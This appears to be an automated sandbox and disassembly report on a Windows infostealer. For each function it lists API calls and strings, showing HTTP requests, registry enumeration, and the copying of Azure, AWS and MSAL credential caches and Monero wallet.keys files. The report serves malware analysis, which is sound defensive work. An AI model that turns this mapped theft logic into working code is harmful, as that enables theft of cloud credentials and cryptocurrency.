Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 8872deef7c5e21ff6d15ce111c3ed167d1f6e3ae61a9517078ba8044c6d62352
Instruction ID: d91021983535b2ec174a55fbeccbcfa113ccd76f1c3ee7c791453d5059858bec
Opcode Fuzzy Hash: 8872deef7c5e21ff6d15ce111c3ed167d1f6e3ae61a9517078ba8044c6d62352
Instruction Fuzzy Hash: 7912BF719106189ADB16EB90DC52FEEB778BF14301F504299B9067A0A1EF702F4DEF62

Function 00358320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

RegOpenKeyExA.KERNEL32(00000000,0136AEA0,00000000,00020019,00000000,003605B6), ref: 003583A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
wsprintfA.USER32 ref: 00358459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0035847B
RegCloseKey.ADVAPI32(00000000), ref: 0035848C
RegCloseKey.ADVAPI32(00000000), ref: 00358499

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Strings

?, xrefs: 0035837A
- , xrefs: 003585A3
%s\%s, xrefs: 0035844D

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
Instruction ID: 64e09cb10532675955416ba166dd4172111353a768a202743fd145ba21c65c0d
Opcode Fuzzy Hash: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
Instruction Fuzzy Hash: 6C812D7191011CABEB29DB50CC91FEAB7B8FF18701F008299E909A6150DF756B89DFA1

Function 00346280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
StrCmpCA.SHLWAPI(?,0136E5D0), ref: 00346303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
HttpOpenRequestA.WININET(00000000,GET,?,0136D9D0,00000000,00000000,00400100,00000000), ref: 00346385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003463FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034646D
InternetCloseHandle.WININET(00000000), ref: 003464EF
InternetCloseHandle.WININET(00000000), ref: 003464F9
InternetCloseHandle.WININET(00000000), ref: 00346503

Strings

GET, xrefs: 0034637C
ERROR, xrefs: 003464C9
ERROR, xrefs: 00346407

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: c88df46d983d95a4cc0d17204ca28328c1cf1c6bbfef0b954fde11a963e42789
Instruction ID: e4013ae3073bcc008fea48efc0b58e6e050673e7f22e39b3cd29034a2633060a
Opcode Fuzzy Hash: c88df46d983d95a4cc0d17204ca28328c1cf1c6bbfef0b954fde11a963e42789
Instruction Fuzzy Hash: 84714E71A00218ABEF15DF90CC46FEE77B8FB45701F108199F90A6B190DBB46A89DF52

Function 00355510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003556A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355857

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 003552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 0035532F
Part of subcall function 003552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 00355383
Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 003553AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355A0C
Sleep.KERNEL32(0000EA60), ref: 00355A1B

Strings

ERROR, xrefs: 003559FE
ERROR, xrefs: 00355849
ERROR, xrefs: 0035577D
ERROR, xrefs: 00355693
ERROR, xrefs: 00355932
ERROR, xrefs: 00355636

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
Instruction ID: 6784a190b17e26556996cf15ab75efa8d34b5fb7953fa0129cf09f45acaad1f6
Opcode Fuzzy Hash: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
Instruction Fuzzy Hash: 3FE151719109049ADB16FBB0DC52EED7778AF54301F408629BD076A0B1EF346B4DEBA2

Function 00354D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00354DCD

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

lstrcat.KERNEL32(?,00000000), ref: 00354E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00354E59

Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92

lstrcat.KERNEL32(?,00000000), ref: 00354EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00354EE5

Part of subcall function 00354910: wsprintfA.USER32 ref: 003549B0
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,003608D2), ref: 003549C5
Part of subcall function 00354910: wsprintfA.USER32 ref: 003549E2
Part of subcall function 00354910: PathMatchSpecA.SHLWAPI(?,?), ref: 00354A1E
Part of subcall function 00354910: lstrcat.KERNEL32(?,0136E5B0), ref: 00354A4A
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FF8), ref: 00354A5C
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A70
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FFC), ref: 00354A82
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A96
Part of subcall function 00354910: CopyFileA.KERNEL32(?,?,00000001), ref: 00354AAC
Part of subcall function 00354910: DeleteFileA.KERNEL32(?), ref: 00354B31

Strings

Azure\.IdentityService, xrefs: 00354EEB
Azure\.aws, xrefs: 00354E5F
\.aws\, xrefs: 00354E4D
*.*, xrefs: 00354E64
\.IdentityService\, xrefs: 00354ED9
Azure\.azure, xrefs: 00354DD3
\.azure\, xrefs: 00354DC1
*.*, xrefs: 00354DD8
msal.cache, xrefs: 00354EF0

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 337ce3d366c6225d7903dfaf933136263a86c499d03b53c8b3e4d92164ae67d1
Instruction ID: b537337d803d2f2df30771f75921e079b07435743e321421a03fa568c40c239a
Opcode Fuzzy Hash: 337ce3d366c6225d7903dfaf933136263a86c499d03b53c8b3e4d92164ae67d1
Instruction Fuzzy Hash: 6C41B3BA94020467DB15F770EC47FED7378AB24701F008594BA897A0C5EEB45BCD9BA2

Function 00341310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
Part of subcall function 003412A0: RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
Part of subcall function 003412A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003412D7
Part of subcall function 003412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
Part of subcall function 003412A0: RegCloseKey.ADVAPI32(?), ref: 003412FF

lstrcat.KERNEL32(?,00000000), ref: 0034134F
lstrlen.KERNEL32(?), ref: 0034135C
lstrcat.KERNEL32(?,.keys), ref: 00341377

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0136A088,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01368840,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00341465

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

DeleteFileA.KERNEL32(00000000), ref: 003414EF

Strings

\Monero\wallet.keys, xrefs: 0034138D
.keys, xrefs: 0034136B
wallet_path, xrefs: 00341330
SOFTWARE\monero-project\monero-core, xrefs: 00341335

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 081d9eeedb3e60713107f642242e82f435869dcefd1baa4c459fd1d244603404
Instruction ID: 9321f96a654cc918403da9926c651249be75b1d156b6522cf1e1bd7e05885ca0
Opcode Fuzzy Hash: 081d9eeedb3e60713107f642242e82f435869dcefd1baa4c459fd1d244603404
Instruction Fuzzy Hash: 0F5153B1D5051857CB16EB60DC92FED777CAF54301F404298BA0AAA091EE306B8DDFA6

Function 00357500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00357542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0035757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357603
RtlAllocateHeap.NTDLL(00000000), ref: 0035760A
wsprintfA.USER32 ref: 00357640

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Strings

\, xrefs: 00357560
6, xrefs: 0035764D, 00357655, 0035761B, 00357623
C, xrefs: 0035754C
:, xrefs: 0035755C

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
